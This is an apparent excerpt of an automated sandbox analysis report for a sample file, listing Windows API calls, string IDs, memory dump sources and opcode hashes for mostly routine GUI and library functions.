                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 83/
                                                                  • API String ID: 0-2323854675
                                                                  • Opcode ID: c28ee5e979c7d7f8e60c80e218802156e96a947d8bc52e0403f0556230c39eca
                                                                  • Instruction ID: 32589c4959240b071e46428e1b38c6999efd97196beca0c7cc173b8fa905a0f8
                                                                  • Opcode Fuzzy Hash: c28ee5e979c7d7f8e60c80e218802156e96a947d8bc52e0403f0556230c39eca
                                                                  • Instruction Fuzzy Hash: 5B517A71300A40AFDB25AF65C889F6EB7E9AF88704F110569F94ADB2A1DF70ED00CB50
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 001EC112
                                                                  • SendMessageW.USER32(00000000,0000040C,00000000,00000000), ref: 001EC151
                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 001EC180
                                                                  • SetRectEmpty.USER32(?), ref: 001EC1DA
                                                                  • SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 001EC240
                                                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 001EC266
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$EmptyParentRectRedrawWindow
                                                                  • String ID: To/
                                                                  • API String ID: 3879113052-3711964495
                                                                  • Opcode ID: 5aadf9c324015e093cd98fb7854e903c2935a7237c5b6b5fdd463fad5bd53af9
                                                                  • Instruction ID: 12e21d0556222d0b11282f5156d08d28e4094e891b1a437c5ac5950a9137c57f
                                                                  • Opcode Fuzzy Hash: 5aadf9c324015e093cd98fb7854e903c2935a7237c5b6b5fdd463fad5bd53af9
                                                                  • Instruction Fuzzy Hash: 4A514871A00649DFDB21DFA9CC85BADBBF5BF48300F204169E556EB291EB709941CF80
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 001F8527
                                                                  • CloseHandle.KERNEL32(kQ),00000080,0029516B,?,00000000,?,00000000), ref: 001F8560
                                                                  • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,00000080,0029516B,?,00000000,?,00000000), ref: 001F8587
                                                                  • GetTempFileNameW.KERNEL32(000000FF,AFX,00000000,00000000,00000104,00000000,000000FF,?,00000000), ref: 001F85BE
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000000), ref: 001F85E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FileTemp$CloseCreateH_prolog3_catchHandleNamePath
                                                                  • String ID: AFX$kQ)
                                                                  • API String ID: 1737446630-615654425
                                                                  • Opcode ID: 356438b99f3050bedf349fa3d6f8ebc930e34122a4ad47c9d9aaaf7041bee007
                                                                  • Instruction ID: ae866e22125210e417caa9fcb82e0f4ebd7a672872f152fabaeef718dad5e69c
                                                                  • Opcode Fuzzy Hash: 356438b99f3050bedf349fa3d6f8ebc930e34122a4ad47c9d9aaaf7041bee007
                                                                  • Instruction Fuzzy Hash: F0418B70800149AFCB00EBA4CD95EEEBBB8AF64314F10425DB556A72E1DF309A05CB61
                                                                  APIs
                                                                    • Part of subcall function 001D4CAE: GetParent.USER32(?), ref: 001D4D02
                                                                    • Part of subcall function 001D4CAE: GetLastActivePopup.USER32(?), ref: 001D4D13
                                                                    • Part of subcall function 001D4CAE: IsWindowEnabled.USER32(?), ref: 001D4D27
                                                                    • Part of subcall function 001D4CAE: EnableWindow.USER32(?,00000000), ref: 001D4D3A
                                                                  • EnableWindow.USER32(?,00000001), ref: 001D4DAD
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 001D4DC1
                                                                  • GetCurrentProcessId.KERNEL32(?,?), ref: 001D4DCB
                                                                  • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 001D4DE3
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 001D4E5F
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 001D4EA6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                  • String ID: 0
                                                                  • API String ID: 1877664794-4108050209
                                                                  • Opcode ID: 8fe2dbc6209fa99df747a29acfb0661ebbb8687ff488fd8f9345dda4ad8477d5
                                                                  • Instruction ID: 365381288d022e3a99ec2d5fb5f41f20f640e962323f6193fe897476039dd060
                                                                  • Opcode Fuzzy Hash: 8fe2dbc6209fa99df747a29acfb0661ebbb8687ff488fd8f9345dda4ad8477d5
                                                                  • Instruction Fuzzy Hash: A9419272A40258ABCB319F64DC897EAB7B9FF14710F24059AF519D6290DB70DE808F90
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0024EBE2
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • _wcslen.LIBCMT ref: 0024EC5E
                                                                  • _wcslen.LIBCMT ref: 0024EC97
                                                                  • _wcslen.LIBCMT ref: 0024ECB3
                                                                  • _wcslen.LIBCMT ref: 0024ECCF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$H_prolog3$Exception@8Throw
                                                                  • String ID: 4)1$SOFTWARE\
                                                                  • API String ID: 1893837447-3232284854
                                                                  • Opcode ID: 30172449505c7015a29a4e67aa50d4c50da5abcddf05ce841b5ac1b4f9c1b9dd
                                                                  • Instruction ID: c84a7397e5b7ec66bfc28a38c98a403127dc7b14b1bc3784027b6b1fc2e10ea6
                                                                  • Opcode Fuzzy Hash: 30172449505c7015a29a4e67aa50d4c50da5abcddf05ce841b5ac1b4f9c1b9dd
                                                                  • Instruction Fuzzy Hash: A2313E719210569BDF08BFA4CC92EFE7369FF30314715442DB416AB1A2DB30AE94CB51
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C681D
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C6840
                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 001C68C4
                                                                  • __CxxThrowException@8.LIBCMT ref: 001C68D2
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C68E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
                                                                  • String ID: bad cast$t!1
                                                                  • API String ID: 2513498551-666071036
                                                                  • Opcode ID: b39fe94c2c19c2454bdff333c2082052a2a804449e2b4738b369e9d4f9f8d577
                                                                  • Instruction ID: a97781710004807aaaaa2385ce7b0f73853774014adde1fe1cac605bf6b70590
                                                                  • Opcode Fuzzy Hash: b39fe94c2c19c2454bdff333c2082052a2a804449e2b4738b369e9d4f9f8d577
                                                                  • Instruction Fuzzy Hash: 7431BD71910205DFCB25DF54D892FAEB7B8EB24324F50466EE826A7291DB70ED40CF91
                                                                  APIs
                                                                    • Part of subcall function 0023283C: GdipGetImagePixelFormat.GDIPLUS(?,00336BF4,00000000,00000000,?,00235698,00000000,00000000,00336BF4), ref: 0023284C
                                                                  • _free.LIBCMT ref: 002357A1
                                                                  • _free.LIBCMT ref: 002357ED
                                                                  • GdipBitmapLockBits.GDIPLUS(?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00336BF4), ref: 002358B6
                                                                  • _free.LIBCMT ref: 002358E6
                                                                    • Part of subcall function 0023285E: GdipGetImagePaletteSize.GDIPLUS(?,00000000,00000000,00000000,?,00235752,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00232872
                                                                  • GdipBitmapUnlockBits.GDIPLUS(00000005,?,?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00336BF4), ref: 00235962
                                                                  • _free.LIBCMT ref: 002359DD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Gdip_free$BitmapBitsImage$FormatLockPalettePixelSizeUnlock
                                                                  • String ID:
                                                                  • API String ID: 4092590016-0
                                                                  • Opcode ID: 00d09881e0a0fb363fc22c3d15947d362abffd36919684e310a13cea0cd52205
                                                                  • Instruction ID: 58de24e806090ccfac63a082af211a524ebef1aed3d84dd7dd89e3cd730e1476
                                                                  • Opcode Fuzzy Hash: 00d09881e0a0fb363fc22c3d15947d362abffd36919684e310a13cea0cd52205
                                                                  • Instruction Fuzzy Hash: 25A17DF1920629DBCB319F14CD80BA9B7B4AF44310F1084E9EA4DA7241CB749EE5CF98
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Visible_memset$MetricsRectSystemZoomed
                                                                  • String ID:
                                                                  • API String ID: 3274878110-0
                                                                  • Opcode ID: 14179e27d335082aa5576e1681d7b9b2ad6fe4a2e5945c7552b143d5cc9d4090
                                                                  • Instruction ID: fbddc6613399b5b83f00af215a92507016b65aea2e3a9d179f3ff286c29b7e7c
                                                                  • Opcode Fuzzy Hash: 14179e27d335082aa5576e1681d7b9b2ad6fe4a2e5945c7552b143d5cc9d4090
                                                                  • Instruction Fuzzy Hash: 52915AB1E1021A9FCF10DFA9C884AEEBBB6FF58700F14416AF805AB255D7709941CFA1
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00234BF2
                                                                  • EnterCriticalSection.KERNEL32(00336BF4,00000014,001F809A,?,?,00000000,00000000,00000000,00000000), ref: 00234C17
                                                                  • SelectObject.GDI32(?,00000014), ref: 00234D06
                                                                  • LeaveCriticalSection.KERNEL32(00336BF4,?,00000014,001F809A,?,?,00000000,00000000,00000000,00000000), ref: 00234D25
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00234D48
                                                                  • SelectObject.GDI32(00000000), ref: 00234D57
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00234DE1
                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00234E01
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Create$BitmapCompatibleCriticalObjectSectionSelect$EnterH_prolog3Leave
                                                                  • String ID:
                                                                  • API String ID: 4255533662-0
                                                                  • Opcode ID: cfb20ef07fe994c8f859cd87e141dafecdff72b14909cc685e1fd09e4fa712b1
                                                                  • Instruction ID: 2f7031a84bc41d71e79815697f26191f0926895a4056a4fbe48611c938965554
                                                                  • Opcode Fuzzy Hash: cfb20ef07fe994c8f859cd87e141dafecdff72b14909cc685e1fd09e4fa712b1
                                                                  • Instruction Fuzzy Hash: 4D718EB0621B02DFCB21EF65C881A6AB7E5FB94304F249D6AE096C6650D771F8A0CF10
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0021F946
                                                                  • GetSystemMenu.USER32(?,00000000,00000038,001E308E,00000000,00000000,?), ref: 0021F9F4
                                                                  • IsMenu.USER32(?), ref: 0021FA09
                                                                  • IsMenu.USER32(?), ref: 0021FA1A
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0021FA42
                                                                  • _memset.LIBCMT ref: 0021FB24
                                                                  • GetMenuItemInfoW.USER32(00000000,0000F060,00000000,?), ref: 0021FB3F
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0021FB94
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Window$H_prolog3InfoItemLongRedrawSystem_memset
                                                                  • String ID:
                                                                  • API String ID: 428562733-0
                                                                  • Opcode ID: 319451ceb6f940f69e4a0fcdf3016d9737a68367d09d862e28836da93229a099
                                                                  • Instruction ID: f43ce82f57456b1c0517ea55d9aa5020c9f23ef7d9971046452adeab39a12632
                                                                  • Opcode Fuzzy Hash: 319451ceb6f940f69e4a0fcdf3016d9737a68367d09d862e28836da93229a099
                                                                  • Instruction Fuzzy Hash: 9571C071910306AFDB51DF60CA84BEEB7F8FF54310F20452DE86A96291DB749A91CF50
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 002A03A7
                                                                  • EqualRect.USER32(?,?), ref: 002A03C6
                                                                  • EqualRect.USER32(?,?), ref: 002A03D7
                                                                  • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 002A0427
                                                                  • CreateRectRgn.GDI32(?,00000000,?,?), ref: 002A045A
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 002A0466
                                                                  • SetWindowRgn.USER32(?,?,00000000), ref: 002A048D
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105,00334F98,?,?,?,00000001,00000058), ref: 002A0505
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Create$EqualWindow$H_prolog3IndirectRedraw
                                                                  • String ID:
                                                                  • API String ID: 1234839666-0
                                                                  • Opcode ID: 4259934b7c604da242bd81c42dafc6ac95b3f6b70637e9667d8b37542916e9ea
                                                                  • Instruction ID: b870309d5c3c987a2159891c8d5bfd0bfe85ce91408b76ff979dc6b47dae8095
                                                                  • Opcode Fuzzy Hash: 4259934b7c604da242bd81c42dafc6ac95b3f6b70637e9667d8b37542916e9ea
                                                                  • Instruction Fuzzy Hash: C051277151010AAFCF01DFA8C899EEF7BB9BF09300F014129B909AB255DB70AA55CFA0
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 001D9716
                                                                  • BeginDeferWindowPos.USER32(00000008), ref: 001D972E
                                                                  • GetTopWindow.USER32(?), ref: 001D9743
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 001D9752
                                                                  • SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 001D9784
                                                                  • GetWindow.USER32(00000000,00000002), ref: 001D978D
                                                                  • CopyRect.USER32(?,?), ref: 001D97AB
                                                                  • EndDeferWindowPos.USER32(00000000), ref: 001D9822
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1228040700-0
                                                                  • Opcode ID: 6b9bdba41056b57647d6bf61647308f4610b019a0a53a60c0de640e4443bd175
                                                                  • Instruction ID: 71009aef48e43ec616e87bbe28197f9b2a4298597843be51bc579bc5a18c5917
                                                                  • Opcode Fuzzy Hash: 6b9bdba41056b57647d6bf61647308f4610b019a0a53a60c0de640e4443bd175
                                                                  • Instruction Fuzzy Hash: 36511372910219DFCF15DFA8D8889EEB7B9FF49310F14816AE805BB250DB359940CFA4
                                                                  APIs
                                                                    • Part of subcall function 0023CB2E: ReleaseCapture.USER32 ref: 0023CB5C
                                                                    • Part of subcall function 0023CB2E: IsWindow.USER32(?), ref: 0023CB80
                                                                    • Part of subcall function 0023CB2E: DestroyWindow.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 0023CB90
                                                                  • SetRectEmpty.USER32(?), ref: 001E84CA
                                                                  • ReleaseCapture.USER32 ref: 001E84D0
                                                                  • SetCapture.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 001E84DF
                                                                  • GetCapture.USER32 ref: 001E8521
                                                                  • ReleaseCapture.USER32 ref: 001E8531
                                                                  • SetCapture.USER32(?,?,001EC05C,?,?,?,?,?,001E21AF,00000000,?,001E1D2F), ref: 001E8540
                                                                  • RedrawWindow.USER32(?,?,?,00000505), ref: 001E85AB
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 001E85EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Capture$Window$Release$Redraw$DestroyEmptyRect
                                                                  • String ID:
                                                                  • API String ID: 2209428161-0
                                                                  • Opcode ID: 8a3b0252272e925d49f41cf90df3083901ad7f64c24865601e64b736e19bd9f0
                                                                  • Instruction ID: 55dbcfaaaaa1cbc2d24e1f4348ad05f183807f453febd5f1afedc35cff32281c
                                                                  • Opcode Fuzzy Hash: 8a3b0252272e925d49f41cf90df3083901ad7f64c24865601e64b736e19bd9f0
                                                                  • Instruction Fuzzy Hash: D4416C71200A409FD725AB35D84DF5F7BA9BF94325F250A1DE5AECB2A0DF30E8008B50
                                                                  APIs
                                                                  • ScreenToClient.USER32(?,?), ref: 00253BC1
                                                                  • GetParent.USER32(?), ref: 00253BD8
                                                                  • GetClientRect.USER32(?,?), ref: 00253C66
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 00253C79
                                                                  • PtInRect.USER32(?,?,?), ref: 00253C89
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
